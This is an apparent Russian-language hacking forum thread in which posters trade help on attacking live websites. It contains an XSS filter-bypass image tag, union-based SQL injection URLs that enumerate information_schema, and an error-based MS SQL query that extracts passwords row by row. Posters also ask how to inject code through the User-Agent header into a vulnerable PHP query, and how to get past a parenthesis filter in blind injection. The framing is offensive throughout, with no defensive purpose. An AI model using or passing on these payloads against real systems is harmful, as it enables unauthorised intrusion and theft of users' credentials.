Code: <IMG SRC="jav[TAB]ascript:alert('XSS');"> и Code: < scr ip t > это всеже совершенно разные вещи - в первом случае ты TAB вставляешь в атрибут тега, а во втором - в имя тега. Любой нормальный браузер вообще не будет это интерпретировать как тег.
Доброго времени суток Товарищи.Имеется инъекция в которой выводятся база юзер и версия но при попытке вывода таблиц из INFORMATION_SCHEMA появляется ошибка Not Acceptable An appropriate representation of the requested resource /sex.php could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache Server at www.site.com Port 80 Кто нибудь сталкивался с этим?
Можно ли здесь чёта провернуть: $update = mysql_query("UPDATE `chat_users` SET `time` = '".$online."', `place` = 0, `ip` = '".getenv('REMOTE_ADDR')."', `ua` = '".htmlspecialchars(getenv('HTTP_USER_AGENT'))."' WHERE `id` = '".$id."';"); если вставить свой код в HTTP_USER_AGENT? И если да то какой код надо? Заранее спс за ответ
Ну да. бенчмарк можно заюзать или мор1ров. Будет что-то вроде такого пакета А это тебе виднее. Чего ты хочешь добиться то от инъекции ? Рекомендую почитать http://forum.antichat.ru/thread35207.html https://forum.antichat.ru/showthread.php?t=26987 С тех пор ничего не изменилось =) Я надеюсь ты не на нулледе хайды хенкать хоч ?)) А то люди значит постят, стараются, работают на коллективное благо так сказать, а ты на все готовенькое хочешь ? Не хорошо, товарищ, не хорошо
Подскажите здесь можно что то зделать, вот sql: union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ. БД по всей видимости MySQL: но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся): и в hex тоже
чем можно сдампить ms sql базу? чтобы руками не перебирать например такое =1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+from+part_pass+where+inc=1)-- 1 потом 2,3 итд
Помогите, пожалуйста, разобраться, только постигаю азы: запрос: news.php?id=-349+union+select+1,2,3,4,5,6,7,8,9-- потом: news.php?id=-349+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+1,1-- получаю имена таблиц: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS и т.д. далее пытаюсь определить столбцы, делаю: news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+information_shema.columns+where+ table_name='имя_таблицы'+limit+1,1-- и тут тишина.... страница открывается ак же как при запросе: news.php?id=349' по version() выдает: 5.0.67-0ubuntu6 как быть дальше?
